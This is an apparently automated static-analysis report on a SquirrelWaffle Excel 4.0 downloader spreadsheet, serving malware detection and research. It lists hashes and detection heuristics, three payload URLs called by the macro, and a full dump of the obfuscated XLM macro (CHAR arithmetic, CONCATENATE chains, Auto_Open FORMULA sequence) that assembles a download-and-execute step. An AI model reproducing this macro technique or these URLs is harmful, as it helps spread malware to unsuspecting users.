SquirrelWaffle — Office (OLE) / .XLS malware analysis

Static analysis result for SHA-256 3f453d0703fa8170…

MALICIOUS

Office (OLE) / .XLS

263.0 KB Created: 2015-06-05 18:19:34 Authoring application: Microsoft Excel First seen: 2021-09-25
MD5: 77bd39191fdc817f2f14f0462bff8d86 SHA-1: ea94f85f59615cfec1b3d330810e9d91ff79bd71 SHA-256: 3f453d0703fa81709d25c6ade25215066f38abceec9699b7b49fb9b4171bbb50
302 Risk Score

Malware Insights

SquirrelWaffle · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1059.001 PowerShell T1059.003 Windows Command Shell

The sample is an Excel 4.0 spreadsheet containing an Auto_Open macro, which is a critical indicator of malicious intent. The macro utilizes ShellExecute and dangerous formula APIs, consistent with downloading and executing a second-stage payload. ClamAV detection confirms this, identifying it as Xls.Downloader.SquirrelWaffle. The embedded URLs are likely sources for this payload.

Heuristics 7

  • ClamAV: Xls.Downloader.SquirrelWaffle20921-9895790-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Downloader.SquirrelWaffle20921-9895790-0
  • Excel 4.0 Auto_Open defined name critical OLE_XLM_AUTOOPEN_DEFINEDNAME
    oletools recovered an Auto_Open / Auto_Close entry from an Excel 4.0 macro sheet. The raw BIFF name can be tokenized or partially opaque to byte-string checks, but the recovered macro listing confirms the workbook has an XLM auto-execution entry.
  • XLM Auto_Open with dangerous formula APIs critical OLE_XLM_DANGEROUS_FN
    Excel 4.0 macro sheet contains an Auto_Open / Auto_Close entry and dangerous XLM formula APIs that can invoke programs, write files, or transfer control without VBA.
  • URL reconstructed from XLM cell array (3 URLs) critical OLE_XLM_CELL_ARRAY_URL
    Excel 4.0 macro sheet stages its payload URL across the BIFF8 Shared String Table (one quoted-char SST entry concatenated with & at runtime), across individual numeric cells (one ASCII charcode per cell), or split across multi-char fragment cells a download formula concatenates by reference (=A1&A2&… / CONCATENATE(...)). The reconstructed URL is invisible to literal-bytes URL extraction because it is never contiguous in the workbook stream. URLs were recovered by walking the BIFF8 record stream and decoding SST entries, LABELSST/RK/NUMBER cells, and FORMULA cell-reference concatenation in token order.
  • Reference to ShellExecute API high SC_STR_SHELLEXEC
    Reference to ShellExecute API
  • Excel 4.0 (XLM) macro sheet present medium OLE_XLM_AUTOOPEN
    Workbook contains an Excel 4.0 macro sheet sub-stream — XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL https://cortinastelasytrazos.com/Yro6Atvj/sec.html Referenced by macro
    • https://orquideavallenata.com/4jmDb0s9sg/sec.htmlReferenced by macro
    • https://fundacionverdaderosheroes.com/gY0Op5Jkht/sec.htmlReferenced by macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
xlm_macros.txt xlm-macro oletools.olevba.extract_all_macros (XLM macro listing) 9167 bytes
SHA-256: 125eeb65449215b38b4c93bcf67effc9a2990373b692ed6d0729f78b6e651f74
Preview script
First 1,000 lines of the extracted script
' 0085     13 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible -  Shee
' 0085     10 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, hidden -  N
' 0085     11 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, hidden -  su
' 0085     11 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, hidden -  ep
' 0085     11 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, hidden -  ep
' 0085     11 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, hidden -  ep
' 0085     11 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, hidden -  ep
' 0085     11 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, hidden -  ep
' 0085     11 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, hidden -  ep
' 0085     11 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, hidden -  ep
' 0085     11 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, hidden -  ep
' 0085     11 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, hidden -  ep
' 0085     12 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, hidden -  frm
' 0085     13 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, hidden -  frm.
' 0085     14 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, hidden -  frm..
' 0085     12 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, hidden -  fev
' 0085     12 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, hidden -  fte
' 0085     11 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, hidden -  ch
' 0085     11 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, hidden -  ci
' 0018     29 LABEL : Cell Value, String Constant - _xlfn.ARABIC hidden len=2 ptgErr  *INCOMPLETE FORMULA PARSING* Remaining, unparsed expression: b'\x1d'
' 0018     23 LABEL : Cell Value, String Constant - built-in-name 1 Auto_Open len=7 ptgRef3d  frm.!E1 
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' Sheet,Reference,Formula,Value
'  su,D1,CHAR(200-86),""
'  su,G2,CHAR(109-61),""
'  su,K2,CHAR(190-91),""
'  su,O2,CHAR(150-68),""
'  su,C3,CHAR(200-99),""
'  su,M3,CHAR(184-99),""
'  su,H4,CHAR(200-133),""
'  su,N4,CHAR(179-103),""
'  su,B5,CHAR(200-125),""
'  su,E5,CHAR(101-50),""
'  su,J5,CHAR(250-134),""
'  su,P5,CHAR(230-130),""
'  su,F7,CHAR(100-50),""
'  su,I7,CHAR(210-113),""
'  su,L7,CHAR(220-109),""
'  su,Q7,CHAR(157-88),""
'  su,N8,CHAR(180-61),""
'  su,A9,CHAR(201-91),""
'  su,C9,CHAR(210-102),""
'  su,H10,CHAR(140-72),""
'  su,J10,CHAR(230-109),""
'  su,P10,CHAR(186-102),""
'  su,D11,CHAR(140-91),""
'  su,L11,CHAR(192-100),""
'  su,E12,CHAR(190-75),""
'  su,I12,CHAR(220-115),""
'  su,Q12,CHAR(190-70),""
'  su,S12,CHAR(207-104),""
'  su,B13,CHAR(101-36),""
'  su,O13,CHAR(160-90),""
'  su,K14,CHAR(145-99),""
'  su,D15,CHAR(145-71),""
'  su,G15,CHAR(210-93),""
'  su,P15,CHAR(190-86),""
'  su,T15,CHAR(197-85),""
'  su,L16,CHAR(150-84),""
'  su,E17,CHAR(230-172),""
'  su,I17,CHAR(205-96),""
'  su,Q17,CHAR(240-122),""
'  su,N18,CHAR(150-67),""
'  su,B19,CHAR(220-108),""
'  su,J21,CHAR(108-55),""
'  su,H32,_xlfn.ARABIC("CXI"),""
'  su,D35,_xlfn.ARABIC("CI"),""
'  su,K43,_xlfn.ARABIC("LXVII"),""
'  ep,I2,"CONCATENATE( Shee!S24, Shee!N18, Shee!P15, Shee!C3, Shee!C9, Shee!C9, Shee!E5, Shee!F7, Shee!S24, Shee!S25)",""
'  ep,Q4,"CONCATENATE( Shee!S24, Shee!L7, Shee!T15, Shee!C3, Shee!A9, Shee!S24, Shee!S25)",""
'  ep,D5,"CONCATENATE( Shee!S24, Shee!H4, Shee!D1, Shee!C3, Shee!I7, Shee!J5, Shee!C3,, Shee!H10, Shee!I12, Shee!D1, Shee!C3, Shee!K2, Shee!J5, Shee!L7, Shee!D1, Shee!J10, Shee!B13, Shee!S24, Shee!S25)",""
'  ep,L7,"CONCATENATE( Shee!S24, Shee!N18, Shee!P15, Shee!C3, Shee!C9, Shee!C9, Shee!Q7, Shee!Q12, Shee!C3, Shee!K2, Shee!G15, Shee!J5, Shee!C3, Shee!B13, Shee!S24, Shee!S25)",""
'  ep,S7,"CONCATENATE( Shee!S24, Shee!D1, Shee!C3, Shee!S12, Shee!E12, Shee!Q17, Shee!D1, Shee!E5, Shee!F7, Shee!S24, Shee!S25)",""
'  ep,H9,"CONCATENATE( Shee!S24, Shee!M3, Shee!O2,)",""
'  ep,F10,"CONCATENATE( Shee!S24, Shee!D15, Shee!H4, Shee!D15, Shee!S24, Shee!S25)",""
'  ep,O11,"CONCATENATE( Shee!S24, Shee!D15, Shee!D15, Shee!H4, Shee!H4, Shee!H4, Shee!D15, Shee!D15, Shee!S24, Shee!S25)",""
'  ep,B13,"CONCATENATE( Shee!S24, Shee!B5, Shee!C3, Shee!D1, Shee!A9, Shee!C3, Shee!C9, Shee!E5, Shee!F7, Shee!S24, Shee!S25)",""
'  ep,H14,"CONCATENATE( Shee!S24, Shee!D15, Shee!D15, Shee!H4, Shee!H4, Shee!L16, Shee!L16, Shee!S24, Shee!S25)",""
'  ep,F15,"CONCATENATE( Shee!S24, Shee!G15, Shee!D1, Shee!C9, Shee!I17, Shee!L7, Shee!A9, Shee!S24, Shee!S25)",""
'  ep,D17,"CONCATENATE( Shee!S24, Shee!H4, Shee!E17, Shee!L11, Shee!H10, Shee!I7, Shee!J5, Shee!L7, Shee!B19, Shee!S24, Shee!S25)",""
'  ep,B21,"CONCATENATE( Shee!S24, Shee!H4, Shee!E17, Shee!L11, Shee!H10, Shee!I7, Shee!J5, Shee!L7, Shee!B19, Shee!L11, Shee!J5, Shee!C3, Shee!E12, Shee!J5, Shee!D11, Shee!K14, Shee!J5, Shee!C3, Shee!E12, Shee!J5, Shee!S24, Shee!S25)",""
'  ep,G24,"CONCATENATE( Shee!S24, Shee!H4, Shee!E17, Shee!L11, Shee!H10, Shee!I7, Shee!J5, Shee!L7, Shee!B19, Shee!L11, Shee!J5, Shee!C3, Shee!E12, Shee!J5, Shee!K14, Shee!J5, Shee!C3, Shee!E12, Shee!J5, Shee!S24, Shee!S25)",""
'  ep,E28,"CONCATENATE( Shee!S24, Shee!H4, Shee!E17, Shee!L11, Shee!H10, Shee!I7, Shee!J5, Shee!L7, Shee!B19, Shee!L11, Shee!J5, Shee!C3, Shee!E12, Shee!J5, Shee!F7, Shee!K14, Shee!J5, Shee!C3, Shee!E12, Shee!J5, Shee!S24, Shee!S25)",""
'  ep,I10,"CONCATENATE( Shee!N4, Shee!H10,)",""
'  ep,I11,"CONCATENATE( Shee!L7, Shee!N8,)",""
'  ep,H12,"CONCATENATE( Shee!A9, Shee!C9,)",""
'  ep,J8,"CONCATENATE( Shee!L7, Shee!I7,)",""
'  ep,I11,"CONCATENATE( Shee!P5, Shee!P10,)",""
'  ep,N8,"CONCATENATE(, Shee!O13, Shee!I12, Shee!C9, Shee!S46)",""
'  ep,I12,"CONCATENATE( Shee!B13, Shee!S24, Shee!S25)",""
'  ep,F9,"CONCATENATE( Shee!G2, Shee!S25)",""
'  frm,E8,"FORMULA( N!B13, su!H21)=FORMULA( N!D5, su!H22)=FORMULA( ep!D4, ep!E22)=FORMULA( N!F10, su!H23)=FORMULA( frm!G14, ep!I9)=FORMULA( N!D17, su!H24)=FORMULA( N!H9& ep!I10& ep!I11& ep!H12& ep!J8& ep!I11& ep!I9& ep!N8& ep!E22& fev!I12, su!H27)=FORMULA( Shee!G2, su!H25)=FORMULA( N!F15, su!H26)=FORMULA( frm..!F9, su!H29)=FORMULA( N!H14, su!H28)=FORMULA( N!G24, su!H31)=FORMULA( N!I2, su!H34)=FORMULA( N!L7, su!H35)=FORMULA( fte!G12, ch!C18)=FORMULA( N!O11, su!H36)=FORMULA( N!Q4, su!H38)=FORMULA( N!B21, su!H58)=FORMULA( N!S7, su!H39)=FORMULA( N!G24, su!H40)=FORMULA( N!E28, su!H60)=FORMULA( Shee!J21, su!H42)=FORMULA( Shee!P31& ch!C18& Shee!P34& Shee!P35& Shee!P35& Shee!P36& su!H21& su!H22& su!H23& su!H24& su!H25& Shee!P37, frm.!E15)=FORMULA( Shee!P31& ch!C18& Shee!P34& Shee!P35& Shee!P35& Shee!P36& su!H34& su!H35& su!H36& su!H29& su!H38& su!H39& su!H40& su!H29& su!H42& Shee!P37, frm.!E19)=FORMULA( Shee!P31& ch!C18& Shee!P34& Shee!P35& Shee!P35& Shee!P36& su!H26& su!H27& su!H28& su!H29& N!I18& su!H31& su!H29& su!H25& Shee!P37, frm.!E17)=FORMULA( Shee!P31& ch!C18& Shee!P34& Shee!P35& Shee!P35& Shee!P36& su!H26& su!H27& su!H28& su!H29& N!I19& su!H58& su!H29& su!H25& Shee!P37, frm.!E21)=FORMULA( Shee!P31& ch!C18& Shee!P34& Shee!P35& Shee!P35& Shee!P36& su!H34& su!H35& su!H36& su!H29& su!H38& su!H39& su!H58& su!H29& su!H42& Shee!P37, frm.!E23)=FORMULA( Shee!P31& ch!C18& Shee!P34& Shee!P35& Shee!P35& Shee!P36& su!H26& su!H27& su!H28& su!H29& N!I20& su!H60& su!H29& su!H25& Shee!P37, frm.!E25)=FORMULA( Shee!P31& ch!C18& Shee!P34& Shee!P35& Shee!P35& Shee!P36& su!H34& su!H35& su!H36& su!H29& su!H38& su!H39& su!H60& su!H29& su!H42& Shee!P37, frm.!E27)",""
'  frm..,D11,"FORMULA(CHAR(200-99), ep!I9)",""
'  fev,G14,CHAR( Shee!H32),""
'  fte,D4,CHAR( Shee!D35),""
'  ci,G12,CHAR( Shee!K43),""